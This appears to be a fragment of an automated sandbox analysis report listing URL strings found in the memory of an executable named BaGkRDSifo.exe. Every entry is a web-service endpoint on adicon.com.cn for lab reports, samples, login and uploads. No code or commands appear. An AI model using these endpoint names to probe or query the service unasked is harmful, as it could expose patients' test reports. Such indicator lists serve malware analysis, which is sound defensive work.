            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetBLTCTPicT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetByteReportByYYtmT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetByteReportT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetImageTestT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetInputXmmcListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByAdiconBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportBaseInfoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportDetailByXmlDocumentT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportDetailStringDocumentT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportItemListByAdiconRepnoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportListV1T
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportUserItemByYYTMT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetReportUserItemT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSampleCountT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSampleProcessT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleAiT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleByOtherT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchByteSampleToStringT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchSampleT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeToByteT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetSearchStringSampleT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetTsscInfoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/GetXmmcListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/LoginT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmlUpLoadT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/MeiNianOriginalDataXmmcListT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ReportDetailForHzqbT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ReportDetailT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/ReportDetailbybgrqT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/SelectItemsByCustomerT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByByAdiconRepnoT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/SetSampleDownFlagByCustomerBarocdeT
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/T
            Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT
